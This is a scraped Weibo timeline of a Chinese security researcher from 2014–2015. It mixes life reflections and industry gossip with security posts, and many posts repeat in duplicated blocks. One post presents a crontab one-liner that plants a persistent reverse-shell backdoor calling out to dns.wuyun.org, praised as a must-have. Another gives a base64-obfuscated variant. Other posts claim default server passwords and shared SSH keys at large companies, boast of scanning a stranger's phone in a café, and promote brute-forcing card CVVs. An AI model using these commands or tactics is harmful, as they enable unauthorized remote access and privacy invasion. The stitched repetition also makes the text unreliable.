4

3

16

ringzero

2015-04-30

“Intrusion Kill Chain”模型精髓在于明确提出网络攻防过程中攻防双方互有优势,攻击者需要“步步为营”以完成攻击,而防御者可以在任一环节(从攻击入口到目标网络的关键路径)进行阻断,防守方若能阻断/瓦解攻击方的进攻组织环节,即可成功地挫败对手的攻击企图。
抱歉,此微博已被作者删除。查看帮助:http://t.cn/Rfd3rQV

32

评论

10

ringzero

2015-04-30

Intrusion Kill Chain模型是将攻击者的攻击过程分解为如下七个步骤: Reconnaissance(踩点)、Weaponization(关键信息重组)、Delivery(匹配性探测)、Exploitation(尝试利用发现的弱点)、Installation(稳固入侵成果)、C2(控制维护)、Actions on Objectives(收割数据)。
抱歉,此微博已被作者删除。查看帮助:http://t.cn/Rfd3rQV

14

1

4

ringzero

2015-04-14 来自 微博 weibo.com

呵呵 //@Laruence: [doge] //@stvchu:哦,切克闹 //@小天天:呵呵
@sina坊间八卦: 听说:Holy shit! 多位 Yahoo 北京前员工将内部代码包括密钥和密码上传到了 github,安全部门刚刚才开出 S0 tickets,一大波系统受到威胁,办公室所有人都在骂娘 ​​​

26

6

11

ringzero

2015-04-10 来自 微博 weibo.com

一个人去影院看了《王牌特工》,牛逼的始终还是科技,毕竟只是个搞笑片,整个观影过程感受到的都是:头可断,发型不能乱,血可流,皮鞋不能不擦油。 ​​​

2

9

37

ringzero

2015-04-05 来自 微博 weibo.com

你可以不自己造轮子(重复造轮子),但应该了解轮子的构造,而且越详尽越好,造过轮子才能领悟其中的痛点,才可能提出更新的东西。配图:无限扩张的解析解引擎(双生机制),自学习自生成。 ​​​

30

11

22

ringzero

2015-03-28

未来客户端类的漏洞,利用场景(不对互联网开放)、传播渠道(严重依赖服务端挂马——水坑攻击)、影响的数据(局限在在客户端使用者权限级别)越来越小,基于针对服务端的攻击理应越来越受重视。你们不能因为个人技术癖好而歧视脚本小子、搞WEB的、搞社工的,后面三者才是未来互联网安全的风向标
@ringzero: 互联网的进化经历了三个阶段:从文件(Files)通过文件夹(Folders)的组织形式存储在台式机(Desktop)中,到网页(Pages)以链接(Links)的方式形成网络(Web),再到数据流(Streams)借助标签(Tags)构成云(Cloud)。 ​​​

23

5

11

ringzero

2015-03-28

互联网的进化经历了三个阶段:从文件(Files)通过文件夹(Folders)的组织形式存储在台式机(Desktop)中,到网页(Pages)以链接(Links)的方式形成网络(Web),再到数据流(Streams)借助标签(Tags)构成云(Cloud)。 ​​​

33

7

14

ringzero

2015-03-24 来自 微博 weibo.com

Dark Side Ops: Custom Penetration Testing ​​​

转发

6

10

ringzero

2015-03-23 来自 微博 weibo.com

尽可能的避免走入“每天重复而又熟识的区域”,熟悉区是个时空黑洞,会不断加速、消耗、吞噬你对时间的感官知觉与生理状态。如果你走出办公室,去陌生的国度一个月,去咖啡店办公一个月,就会发现这一个月并没有像办公室里那样(周三过完差不多就到周末了),而是会觉得比在办公室的两个星期都要多。 ​​​

35

7

28

ringzero

2015-03-23 来自 微博 weibo.com

随着每年记忆的增量逐渐减少,如果你每天的工作和生活都是在简单重复,那么大脑中的“总数据”不会有儿时那样迅猛增长的趋势。如今处理重复的24小时,只需动用N年前习得的知识索引(驾轻就熟),总信息量几乎没有增加,你主观上感受到的“新东西”自然就少,而体验“新东西”恰恰是放慢主观时间的命门。
@ringzero: 五岁的时候人的记忆有五年,这时候过一年,到六岁时,记忆增加了五分之一。六岁到七岁,记忆增加了六分之一。七岁到八岁记忆就只增加了七分之一。以此类推,到二十岁的时候,过多一年,记忆便只增加二十分之一。这一年的时间总长虽然没变,但是对于生活感受的参照记忆变了,就会感觉时间过得越来越快。 ​​​

16

2

17

ringzero

2015-03-23 来自 微博 weibo.com

五岁的时候人的记忆有五年,这时候过一年,到六岁时,记忆增加了五分之一。六岁到七岁,记忆增加了六分之一。七岁到八岁记忆就只增加了七分之一。以此类推,到二十岁的时候,过多一年,记忆便只增加二十分之一。这一年的时间总长虽然没变,但是对于生活感受的参照记忆变了,就会感觉时间过得越来越快。 ​​​

27

7

20

ringzero

2015-03-23

如果没有提供好的机器、大的显示器、快速的硬盘、人体工程学桌椅、高速的网络和一个安静的,没有电话,没有会议,没有形式主义、朝令夕改、繁文缛节的环境,那么很多人的工作时间、工作效率实际上都被浪费掉了。我曾工作过的地方,哪怕管理层知道一点点,那效率几乎能翻两番。 ​​​

18

11

33

ringzero

2015-03-20

稻盛和夫曾经说过一个故事,明治时期的手艺人被天皇召见,虽然都是不读书的乡下人,但一辈子兢兢业业地做一件事情,自然会有一股高贵的气质。那些稍微还有点理想的人,应该就是循着这种高贵的气质而去的吧。 ​​​

9

3

28

ringzero

2015-03-09 来自 微博 weibo.com

还有一个可补充:使用不安全的第三方短信服务平台可造成重置验证鉴权码泄露,进而重置密码。案例1:网页链接 , 案例2:网页链接
@乌云知识库: #技术分享# 今日文章来啦,密码找回漏洞普遍存在于各个大中小网站中,那么你知道密码找回漏洞有多少种类型呢,看过这篇文章后一定能刷新你自己的认知,感谢作者BMa投稿的作品《密码找回逻辑漏洞总结》,脑图简直棒呆。网页链接 ​​​

24

2

3

ringzero

2015-03-08 来自 微博 weibo.com

乌云某同学花一个月时间开发的CloudEye(漏洞Fuzz神器),已在乌云集市上架: 网页链接 @乌云知识库 ​​​

43

6

23

ringzero

2015-03-06 来自 微博 weibo.com

内网渗透最常见的套路就是猜密码、猜密码、猜密码,因为人们意识层面的“懒惰和愚蠢”没有补丁可打。
@乌云知识库: #技术分享# 还记得那个《Fireeye Mandiant 2014 安全报告 》吗,很多渴望了解的同学是不是苦于英文不好,我们已经有了翻译版了,现在已出part 1,感谢 insight-labs小组翻译,不管你是不是apt定点打击对象,多看看方便装逼无障碍是不。比如老板问起时说“去年美国火眼那边。。” 网页链接 ​​​

22

4

10

ringzero

2015-03-05

少不看水浒,老不看三国,女不看韩剧,男不看美剧。@Jannock
@财经网: 【政协委员谈国外文化影响:女生看韩剧易任性 男生看美剧易好斗[doge]】洛阳师范学院院长梁留科表示:年轻人喜欢看韩剧、美剧,在观看过程中也会潜移默化地受到影响。像一些女生喜欢学韩剧女主角任性撒娇;男生看美剧出现个人英雄主义情结,好斗冲动。大家要多注意。#2015两会#网页链接 ​​​

7

5

9

ringzero

2015-02-25 来自 微博 weibo.com

通过建立强势的品牌,再用良好的口碑+产品质量积累用户,当你累计了很多死忠客户,才有可能签署更大的订单实现盈利。
@ringzero: 再好的商业模式,也是建立在有足够用户的基础上的,商业运营过程中,用户黏性越高一般来说意味着成本也越高,可以试着先提升产品品质,在用户中创造良好的口碑,从而削减营销成本,再用效率压低其它成本,用多样化开拓赚钱途径,用强大的攻势挤走对手。 ​​​

5

1

6

ringzero

2015-02-25 来自 微博 weibo.com

为小事物狂热
@崔翔宇_采铜: 让自己变得独特的十个方法: ​​​
长图

15

6

5

ringzero

2015-02-20

转发微博
@cvnote计算机视觉笔记: Probabilistic Programming & Bayesian Methods for Hackers | 黑客们的概率编程和贝叶斯方法书,电子版,有代码,介绍为主,减少推导。同时详细介绍了使用PyMC进行MCMC编程的细节。网页链接 ​​​

11

评论

4

ringzero

2015-02-17

用道德的帽子批评他人,逼人检讨(40年前的“斗私批修”)从来都是某体制搞垮别人的手段。因为一旦检讨,承认错误,就意味着“有了污点”,在气势上就“落了下风”。就算这会不整你,把柄缺落在别人手里了,随时随地可以翻出来,老帐新帐一起算。 ​​​

2

7

19

ringzero

2015-02-14 来自 微博 weibo.com

赢在细节,ADC要不停走位A人,酒桶抓到韦鲁斯的移动惯性,直接用肉眼+意识算出余弦点,反射原理拿到人头。。。以后物理几何不好得都不好意思玩LOL了~
@LOL逗比君: #搞笑精选# 这酒桶打台球一定很6 ​​​

16

13

15

ringzero

2015-02-13 来自 微博 weibo.com

30 天学习 30 种新技术系列,我已经接受了挑战,我会在一个月的时间内每天学习一门新技术,第一天熟练掌握Docker,第二天掌握MEAN ....... 网页链接 ​​​

32

9

31

ringzero

2015-02-12 来自 微博 weibo.com

在有些人眼中,好像任何人都会为了更广阔的商业机会而选择失去自己的声音,在另一些人眼中,他们认为你只是个窃取秘密隐私的工具,而在更多人眼中,你不过只是个盗号的。我们都知道,乌云迟早有一天会倒下,或这个原因或那个原因。但这个社会真的没什么值得你放弃和改变自我,理想也不能!

21

6

20

ringzero

2015-02-05 来自 微博 weibo.com

217

24

32

ringzero

2015-02-03

别在任何用户可控的地方使用"unserialize",可以考虑"json_decode"
@乌云知识库: #技术分享# 昨天那篇广受大家好评的《Understanding PHP Object Injection》出翻译版本啦,感谢匿名白帽子投稿的《理解php对象注入》通过大量的例子和浅显易懂的说法让人理解php对象注入,速度点击吧 网页链接 ​​​

2

9

7

ringzero

2015-01-31 来自 微博 weibo.com

#暴力破解# 中国姓名排行TOP500(数据统计来自国家人口数据库),网页链接 ,所有中文Unicode对应的拼音表,仅仅404个拼音,由此可以构建出更加精细化的盲测规则,稍微大一点的企业都扛不住这种盲测攻击。 ​​​

83

23

20

ringzero

2015-01-30 来自 微博 weibo.com

望着包里刚刚帮人买的10个比特币,准备用来买VPN翻墙用的,我不禁叹了口气。
@乌云知识库: #国外黑客简讯# 你们还在相信用比特币就不会被抓吗,太天真了,美国连线杂志最新一期博文关于FBI狗是如何追查一堆比特币把人爆了菊的故事 网页链接 ​​​

11

12

6

ringzero

2015-01-29 来自 微博 weibo.com

回复@tombkeeper: 结对编程(英语:Pair programming)是一种敏捷软件开发的方法,两个程序员在一个计算机上共同工作。一个人输入代码,而另一个人审查他输入的每一行代码。两个程序员经常这样容易摩擦出火花。人们更不愿意打断两个结对的人,而单独工作的人却容易被打断。 //@tombkeeper:结对编程啊
@程序员的那些事: 趣图求配文 [笑cry] #程序员# ​​​

12

13

17

ringzero

2015-01-28 来自 微博 weibo.com

问:在中国,2015你的网络生活谁来操盘?答:我操!
@中国新闻周刊: 【工信部回应VPN被封:不良信息应按中国法律管理】在国务院新闻办公室的新闻发布会上,有香港记者就“中国封杀部分VPN”一事进行提问。对此,工业和信息化部副部长毛伟明回答:在中国发展互联网一定要按照中国的法律法规来进行,一些不良信息应该按照中国法律进行管理。国新办就2014年全年工业通信业发展情况举行发布会 ​​​

13

10

16

ringzero

2015-01-26

//@出版人周筠:大家都不读书,你读书,就会发现很多人都在读书;大家都不锻炼,你锻炼,就会发现原来那么多人都在锻炼。
抱歉,此微博已被作者删除。查看帮助:http://t.cn/Rfd3rQV

19

53

39

ringzero

2015-01-26

*/60 * * * * a=`echo "ZXhlYyA5PD4gL2Rldi90Y3AvbG9jYWxob3N0LzgwODA7ZXhlYyAwPCY5O2V4ZWMgMT4mOSAyPiYxOy9iaW4vYmFzaCAtLW5vcHJvZmlsZSAtaQ=="|base64 -d`;/bin/bash -c "$a";unset a,运行时解密,脚本语言潜力无限,玩法各异
@ringzero: (crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab - ,一条命令实现无文件,兼容任意用户,任意Linux系统的反弹后门,对于懒惰的管理员来说,简直是杀人灭口、穿透网络之必备命令。 ​​​

36

22

21

ringzero

2015-01-25 来自 微博 weibo.com

(crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab - ,一条命令实现无文件,兼容任意用户,任意Linux系统的反弹后门,对于懒惰的管理员来说,简直是杀人灭口、穿透网络之必备命令。 ​​​

150

28

31

ringzero

2015-01-23 来自 微博 weibo.com

262

52

68

ringzero

2015-01-23 来自 微博 weibo.com

信用卡的有效期最长5年,5*12 = 也就是只要60次尝试就能穷举出来,我不知道那些一直说有效期可以保障用卡安全的专家怎么想的,CVV码3位数字,999次也可以穷举出来。银行业(招商银行)设计缺陷可被穷举攻击 网页链接
@乌云-漏洞报告平台: 信用卡除了卡号,最敏感的就当属有效期与CVV码,这两个信息构成简单(3位数字与日期规律)银行在处理这些数据时往往会出现疏忽,导致通过设计缺陷就可以轻易猜解CVV等敏感信息,导致用户产生经济损失。交通银行业务流程审核逻辑不严导致可枚举任意信用卡cvv码 网页链接 ​​​
长图

28

13

17

ringzero

2015-01-22 来自 微博 weibo.com

最近有个白帽子针对携程信用卡那个事(网页链接)向我提出质疑,为什么从图片上分析文件大概有2GB,而官方申明说只有93个用户,2GB = 93个用户?我答:以官方说的为准,不要质疑官方!后话:年轻人,愤怒是最好的力量,愤怒中还带着理智和细致的观察力更难得,但你是在中国。 ​​​

30

18

30

ringzero

2015-01-22 来自 微博 weibo.com

网页链接 移动数据模式下,点开链接,可直接抓到你的手机号,仅限中国移动! ​​​

268

133

59

ringzero

2015-01-21

美国空军公布历年来对不明飞行物(UFO)的调查细节文件,将近13万页的解密蓝皮书见链接:网页链接 ​​​

12

4

18

ringzero

2015-01-20 来自 微博 weibo.com

84

292

82

ringzero

2015-01-19

梦寐以求的黑客技术,谁能告诉我这个软件哪里有卖? ​​​

15

85

51

ringzero

2015-01-17 来自 微博 weibo.com

有白帽子直接用JavaScript就把乌云的验证码给绕过了,你说厉害不厉害 网页链接 ​​​

29

11

37

ringzero

2015-01-05 来自 微博 weibo.com

一些网站使用js动态生成Cookie,塔奇克马无法完成任务,只好引入JavaScript Headless解决方案,远的我们有phantomjs, 一个Headless的WebKit Driver,意味着可以无需GUI,完全模拟Chrome/Safari的操作。 近的有casperjs(基于phantomjs的好用封装),zombie(相比phantomjs的优势是可以和node集成)等。 ​​​

11

4

10

ringzero

2015-01-03 来自 微博 weibo.com

美国Syngress计算机安全丛书出版公司精选的48 本PDF格式书籍( 网页链接 ),毫无疑问,这个档案库是安全人员必备。下载地址:网页链接 @乌云知识库 要不咱来翻译成中文版? ​​​
长图

88

15

24

ringzero

2015-01-01

2014,i'm so sorry. ​​​

转发

4

10

ringzero

2014-12-31 来自 微博 weibo.com

解答乌云、知乎、微博上 #网络安全如何入门# 的提问。 “入门”是良好的动机,实践起来后你将会被目标驱动,直至无往不利。事实上,你完全可以在做任何事情的过程中学习!
@ringzero: 如果知识体系里的每一个知识点是图里的点,依赖关系是边的话,那么这个图一定不是一个有向无环图。因为学习A的经验可以帮助你学习B。因此,你不需要学习怎么样“入门”,因为这样的“入门”点根本不存在!你需要学习的是怎么样做一个比较大的东西,在这个过程中,你会很快地学会需要学会的东西的。 ​​​

5

3

3

ringzero

2014-12-31 来自 微博 weibo.com

如果知识体系里的每一个知识点是图里的点,依赖关系是边的话,那么这个图一定不是一个有向无环图。因为学习A的经验可以帮助你学习B。因此,你不需要学习怎么样“入门”,因为这样的“入门”点根本不存在!你需要学习的是怎么样做一个比较大的东西,在这个过程中,你会很快地学会需要学会的东西的。 ​​​

28

13

10

ringzero

2014-12-27 来自 微博 weibo.com

必看的TED演讲,美女黑客:互联网的免疫系统,最近几年来,黑客在社会中的角色经历了不断的改变。网络安全专家Keren Elazari讲述了这个转变的过程,在她看来,黑客正式电子世界的免疫系统,他们不断的发现网络的弱点,从而督促我们不断完善网络,让它变得更加安全。 视频地址:网页链接 ​​​

56

6

21

ringzero

2014-12-27 来自 微博 weibo.com

雷总,你说常改密码吧,麻烦,现在登录神马网站又都要注册不同的账号,还要求密码复杂性,一个不小心忘记就完了,网站总是提示用户名或密码错误,您倒是告诉我是用户名错还是密码错啊。//@雷军: 不同的互联网服务,一定要用不同的帐号。如果采用相同的帐号密码,任何一个帐号库泄露,影响很大 @李铁军
@金山毒霸: 央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 ​​​ 查看图片

5

8

6

ringzero

2014-12-26 来自 微博 weibo.com

568

50

55

ringzero

2014-12-25 来自 微博 weibo.com

互联网时代无隐私,互联网时代喜欢晒隐私,隐私保护是技术和道德等多重问题。
@ringzero: 如何在网络上保护个人隐私? 网页链接 欢迎参与讨论! ​​​

10

7

4

ringzero

2014-12-25 来自 微博 weibo.com

如何在网络上保护个人隐私? 网页链接 欢迎参与讨论! ​​​

16

7

3

ringzero

2014-12-27 来自 微博 weibo.com

雷总,你说常改密码吧,麻烦,现在登录神马网站又都要注册不同的账号,还要求密码复杂性,一个不小心忘记就完了,网站总是提示用户名或密码错误,您倒是告诉我是用户名错还是密码错啊。//@雷军: 不同的互联网服务,一定要用不同的帐号。如果采用相同的帐号密码,任何一个帐号库泄露,影响很大 @李铁军
@金山毒霸: 央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 ​​​ 查看图片

5

8

6

ringzero

2014-12-26 来自 微博 weibo.com

568

50

55

ringzero

2014-12-25 来自 微博 weibo.com

互联网时代无隐私,互联网时代喜欢晒隐私,隐私保护是技术和道德等多重问题。
@ringzero: 如何在网络上保护个人隐私? 网页链接 欢迎参与讨论! ​​​

10

7

4

ringzero

2014-12-25 来自 微博 weibo.com

如何在网络上保护个人隐私? 网页链接 欢迎参与讨论! ​​​

16

7

3

ringzero

2014-12-22 来自 微博 weibo.com

到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了 ​​​

260

49

50

ringzero

2014-12-06

住着一个大坏蛋。[嘻嘻][嘻嘻][嘻嘻]
@让笑声飞会: 你的密码里是不是住着一个人。。。。。。。。 ​​​

4

评论

7

ringzero

2014-11-23 来自 微博 weibo.com

推荐:Nmap源码分析(Lua脚本引擎)网页链接 ​​​

90

10

17

ringzero

2014-11-22

易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。 ​​​

5

2

15

ringzero

2014-11-16 来自 微博 weibo.com

转发微博
@郭晏平: 其实,发达国家和发展中国家的区别就是:前者自然而然,后者极尽排场,自信和自卑的对比而已 ​​​

22

6

12

ringzero

2014-12-27 来自 微博 weibo.com

雷总,你说常改密码吧,麻烦,现在登录神马网站又都要注册不同的账号,还要求密码复杂性,一个不小心忘记就完了,网站总是提示用户名或密码错误,您倒是告诉我是用户名错还是密码错啊。//@雷军: 不同的互联网服务,一定要用不同的帐号。如果采用相同的帐号密码,任何一个帐号库泄露,影响很大 @李铁军
@金山毒霸: 央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 ​​​ 查看图片

5

8

6

ringzero

2014-12-26 来自 微博 weibo.com

568

50

55

ringzero

2014-12-25 来自 微博 weibo.com

互联网时代无隐私,互联网时代喜欢晒隐私,隐私保护是技术和道德等多重问题。
@ringzero: 如何在网络上保护个人隐私? 网页链接 欢迎参与讨论! ​​​

10

7

4

ringzero

2014-12-25 来自 微博 weibo.com

如何在网络上保护个人隐私? 网页链接 欢迎参与讨论! ​​​

16

7

3

ringzero

2014-12-22 来自 微博 weibo.com

到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了 ​​​

260

49

50

ringzero

2014-12-06

住着一个大坏蛋。[嘻嘻][嘻嘻][嘻嘻]
@让笑声飞会: 你的密码里是不是住着一个人。。。。。。。。 ​​​

4

评论

7

ringzero

2014-11-23 来自 微博 weibo.com

推荐:Nmap源码分析(Lua脚本引擎)网页链接 ​​​

90

10

17

ringzero

2014-11-22

易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。 ​​​

5

2

15

ringzero

2014-11-16 来自 微博 weibo.com

转发微博
@郭晏平: 其实,发达国家和发展中国家的区别就是:前者自然而然,后者极尽排场,自信和自卑的对比而已 ​​​

22

6

12

ringzero

2014-12-27 来自 微博 weibo.com

雷总,你说常改密码吧,麻烦,现在登录神马网站又都要注册不同的账号,还要求密码复杂性,一个不小心忘记就完了,网站总是提示用户名或密码错误,您倒是告诉我是用户名错还是密码错啊。//@雷军: 不同的互联网服务,一定要用不同的帐号。如果采用相同的帐号密码,任何一个帐号库泄露,影响很大 @李铁军
@金山毒霸: 央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 ​​​ 查看图片

5

8

6

ringzero

2014-12-26 来自 微博 weibo.com

568

50

55

ringzero

2014-12-25 来自 微博 weibo.com

互联网时代无隐私,互联网时代喜欢晒隐私,隐私保护是技术和道德等多重问题。
@ringzero: 如何在网络上保护个人隐私? 网页链接 欢迎参与讨论! ​​​

10

7

4

ringzero

2014-12-25 来自 微博 weibo.com

如何在网络上保护个人隐私? 网页链接 欢迎参与讨论! ​​​

16

7

3

ringzero

2014-12-22 来自 微博 weibo.com

到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了 ​​​

260

49

50

ringzero

2014-12-06

住着一个大坏蛋。[嘻嘻][嘻嘻][嘻嘻]
@让笑声飞会: 你的密码里是不是住着一个人。。。。。。。。 ​​​

4

评论

7

ringzero

2014-11-23 来自 微博 weibo.com

推荐:Nmap源码分析(Lua脚本引擎)网页链接 ​​​

90

10

17

ringzero

2014-11-22

易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。 ​​​

5

2

15

ringzero

2014-11-16 来自 微博 weibo.com

转发微博
@郭晏平: 其实,发达国家和发展中国家的区别就是:前者自然而然,后者极尽排场,自信和自卑的对比而已 ​​​

22

6

12

ringzero

2014-12-22 来自 微博 weibo.com

到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了 ​​​

260

49

50

ringzero

2014-12-06

住着一个大坏蛋。[嘻嘻][嘻嘻][嘻嘻]
@让笑声飞会: 你的密码里是不是住着一个人。。。。。。。。 ​​​

4

评论

7

ringzero

2014-11-23 来自 微博 weibo.com

推荐:Nmap源码分析(Lua脚本引擎)网页链接 ​​​

90

10

17

ringzero

2014-11-22

易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。 ​​​

5

2

15

ringzero

2014-11-16 来自 微博 weibo.com

转发微博
@郭晏平: 其实,发达国家和发展中国家的区别就是:前者自然而然,后者极尽排场,自信和自卑的对比而已 ​​​

22

6

12

ringzero

2014-11-14

随着气流上升的风筝,是一种没有实力也想飞得很高的存在。 ​​​

7

1

17

ringzero

2014-10-20 来自 微博 weibo.com

读取到阿里任何一台服务器的/home/admin/.ssh//id_rsa,也是差不多所有服务器通用,和“梅花香自苦寒来”异曲同工。
@ringzero: echo 'MhxzKhl' | passwd --stdin rd,百度的每台服务器,都有一个密码为梅花香自苦寒来的rd用户 [偷笑] ​​​

47

4

9

ringzero

2014-10-20 来自 微博 weibo.com

echo 'MhxzKhl' | passwd --stdin rd,百度的每台服务器,都有一个密码为梅花香自苦寒来的rd用户 [偷笑] ​​​

61

11

9

ringzero

2014-12-27 来自 微博 weibo.com

雷总,你说常改密码吧,麻烦,现在登录神马网站又都要注册不同的账号,还要求密码复杂性,一个不小心忘记就完了,网站总是提示用户名或密码错误,您倒是告诉我是用户名错还是密码错啊。//@雷军: 不同的互联网服务,一定要用不同的帐号。如果采用相同的帐号密码,任何一个帐号库泄露,影响很大 @李铁军
@金山毒霸: 央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 ​​​ 查看图片

5

8

6

ringzero

2014-12-26 来自 微博 weibo.com

568

50

55

ringzero

2014-12-25 来自 微博 weibo.com

互联网时代无隐私,互联网时代喜欢晒隐私,隐私保护是技术和道德等多重问题。
@ringzero: 如何在网络上保护个人隐私? 网页链接 欢迎参与讨论! ​​​

10

7

4

ringzero

2014-12-25 来自 微博 weibo.com

如何在网络上保护个人隐私? 网页链接 欢迎参与讨论! ​​​

16

7

3

ringzero

2014-12-22 来自 微博 weibo.com

到星巴克写东西,旁边坐着两富婆(某基金董事助理)和太古汇商场租赁负责人谈1500万的儿童游乐园项目,我对他们怎么处理回扣这方面听得非常细致。助理说服基金董事砸钱,太古汇拿出10%的独立股份反给富婆!无意瞟到富婆在用她的土豪IP6连无线,只好扫描62078端口记下手机MAC,接下来就是未完待续了 ​​​

260

49

50

ringzero

2014-12-06

住着一个大坏蛋。[嘻嘻][嘻嘻][嘻嘻]
@让笑声飞会: 你的密码里是不是住着一个人。。。。。。。。 ​​​

4

评论

7

ringzero

2014-11-23 来自 微博 weibo.com

推荐:Nmap源码分析(Lua脚本引擎)网页链接 ​​​

90

10

17

ringzero

2014-11-22

易经的乾卦,说君子自强不息,干事业,从下到上6个层次,依次是潜龙勿用,现龙在田,惕龙无咎,跃龙在渊,飞龙在天,亢龙有悔。现在充其量还在潜龙勿用,低调修行的阶段。 ​​​

5

2

15

ringzero

2014-11-16 来自 微博 weibo.com

转发微博
@郭晏平: 其实,发达国家和发展中国家的区别就是:前者自然而然,后者极尽排场,自信和自卑的对比而已 ​​​

22

6

12

ringzero

2014-12-27 来自 微博 weibo.com

雷总,你说常改密码吧,麻烦,现在登录神马网站又都要注册不同的账号,还要求密码复杂性,一个不小心忘记就完了,网站总是提示用户名或密码错误,您倒是告诉我是用户名错还是密码错啊。//@雷军: 不同的互联网服务,一定要用不同的帐号。如果采用相同的帐号密码,任何一个帐号库泄露,影响很大 @李铁军
@金山毒霸: 央视新闻《朝闻天下》报道:【泄露12306数据的两名犯罪嫌疑人已被抓获】两名犯罪嫌疑人已被抓获。犯罪嫌疑人利用已掌握的大量数据库“撞库”攻击12306网站,并非法转卖12306数据。猎豹移动安全专家建议修改12306登录密码及关联邮箱密码,并建议网民重要密码勿重复使用。 ​​​ 查看图片

5

8

6

ringzero

2014-12-26 来自 微博 weibo.com

12306 13W泄露密码,弱口令TOP100出炉(网页链接),希望大家改密码的时候尽量避免使用这些密码规则,不然改了之后,还是会被人计算出来。